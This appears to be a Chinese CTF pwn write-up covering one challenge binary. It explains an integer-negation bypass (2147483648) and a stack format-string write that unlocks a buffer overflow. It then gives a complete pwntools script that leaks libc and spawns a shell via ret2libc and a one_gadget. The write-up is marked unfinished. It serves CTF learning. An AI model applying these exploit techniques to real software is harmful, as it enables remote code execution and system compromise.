半年没做过pwn题了,试着用这个比赛的题来捡一捡知识点。
main函数中需要绕过两个判断才能进入存在漏洞的函数。
第一个判断很简单,输入“dota”就行了。
第二个判断,需要先让v5小于0,在经过v5=-v5之后,继续让v5小于0,看看汇编是怎么样的。
NEG是汇编指令中的求补指令,对操作数执行求补运算:用零减去操作数,然后结果返回操作数。求补运算也可以表达成:将操作数按位取反后加1。
eax可以容纳4个字节,1个字节由8个二进制位构成。
对于2147483648,可以看到符号位是1,绕过了第一层检测,在执行完neg指令完之后会发现,他的补码还是自己的本身,这样就绕过了第二层检测,就可以进入漏洞函数了。
这个函数就比较简单了,有一个栈上的格式化字符串漏洞,利用这个漏洞修改v1的值让它等于25,然后就可以执行read函数进行溢出了,之后就是常规的ret2libc3了。
# Author:bhxdn www.cnblogs.com/bhxdn/ # Date:2022/1/5 from pwn import * p = process('./pwn') elf = ELF('./pwn') libc = ELF('./libc.so.6') context(os='linux',arch='amd64',log_level='debug') def duan(): gdb.attach(p) pause() p.recvuntil('-\n') p.recvuntil('-\n') payload = 'dota' p.sendline(payload) p.recv() p.sendline('2147483648') p.recvuntil('0x') stack_addr = int(p.recv(12),16) print hex(stack_addr) payload = fmtstr_payload(8,{stack_addr:25}) p.sendline(payload) p.recv() p.recvuntil('\n') pop_rdi = 0x04009b3 puts = elf.plt['puts'] puts_got = elf.got['puts'] return_addr = 0x0400737 payload = 'a'*0x80+'bbbbbbbb'+p64(pop_rdi)+p64(puts_got)+p64(puts)+p64(return_addr) p.send(payload) #leak libc libc_addr = int(u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))) print 'libc_addr-->'+hex(libc_addr) libc_base = libc_addr-libc.symbols['puts'] print 'libc_base-->'+hex(libc_base) og = [0x4f365,0x4f3c2,0x10a45c] shell = libc_base+og[2] p.recvuntil('0x') stack_addr = int(p.recv(12),16) print hex(stack_addr) payload = fmtstr_payload(8,{stack_addr:25}) p.sendline(payload) p.recv() p.recvuntil('\n') payload = 'a'*0x80+'bbbbbbbb'+p64(shell) p.send(payload) p.interactive()
未完...